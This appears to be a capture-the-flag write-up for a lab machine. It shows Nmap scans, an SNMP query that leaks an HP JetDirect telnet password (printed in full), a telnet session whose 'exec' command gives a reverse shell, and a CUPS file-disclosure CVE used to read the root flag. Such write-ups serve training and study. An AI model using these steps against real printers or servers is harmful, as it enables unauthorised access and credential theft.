Attempted to scan the target with Nmap, but the scan wouldn't finish. Re-running Nmap with --packet-trace revealed that it kept looping at a password prompt on port 23 (telnet):
$ nmap -sV -sC -PN -oA antique_nmap -p- --exclude-ports 23 10.10.11.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-28 19:29 CEST
Nmap scan report for 10.10.11.107
Host is up (0.074s latency).
All 65534 scanned ports on 10.10.11.107 are in ignored states.
Not shown: 65534 closed tcp ports (reset)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.14 seconds
Attempted a scan against common UDP ports and found port 161 (SNMP) open:
$ sudo nmap -sV -sC -sU -p 53,69,161,162,10161,10162,623 10.10.11.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-28 19:36 CEST
Nmap scan report for 10.10.11.107
Host is up (0.037s latency).
PORT STATE SERVICE VERSION
53/udp closed domain
69/udp closed tftp
161/udp open snmp SNMPv1 server (public)
162/udp closed snmptrap
623/udp closed asf-rmcp
10161/udp closed snmpdtls
10162/udp closed snmpdtls-trap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.90 seconds
The target is running an SNMPv1 server, meaning it can be enumerated directly with the community string public using snmpwalk:
There is a vulnerability (CVE-2002-1048, https://www.exploit-db.com/exploits/22319) in which HP JetDirect passwords can be retrieved by enumerating the OID .1.3.6.1.4.1.11.2.3.9.1.1.13.0:
The first part of the output (50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32 33) translates to P@ssw0rd@123!!123 in ASCII. The password is valid for accessing the telnet server:
$ telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.
HP JetDirect
Password: P@ssw0rd@123!!123
Please type "?" for HELP
> ?
To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>
Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)
addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)
exec: execute system commands (exec id)
exit: quit from telnet session
None of the commands except exec appear to be doing anything useful. Since this command allows running arbitrary system commands, setting up a reverse shell is trivial:
$ netstat -tunap
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN 1035/python3
tcp 0 0 10.10.11.107:23 10.10.16.16:43500 ESTABLISHED 1035/python3
tcp 0 286 10.10.11.107:56504 10.10.16.16:9001 ESTABLISHED 1273/python3
tcp6 0 0 ::1:631 :::* LISTEN -
udp 0 0 0.0.0.0:161 0.0.0.0:* -
udp 0 0 10.10.11.107:44271 8.8.8.8:53 ESTABLISHED
The port is the default port for CUPS, which is the service running:
Version 1.6.1 of CUPS has an unauthenticated file disclosure vulnerability known as CVE-2012-5519. A PoC for it is available. Uploaded it to the target and used it to get the root flag.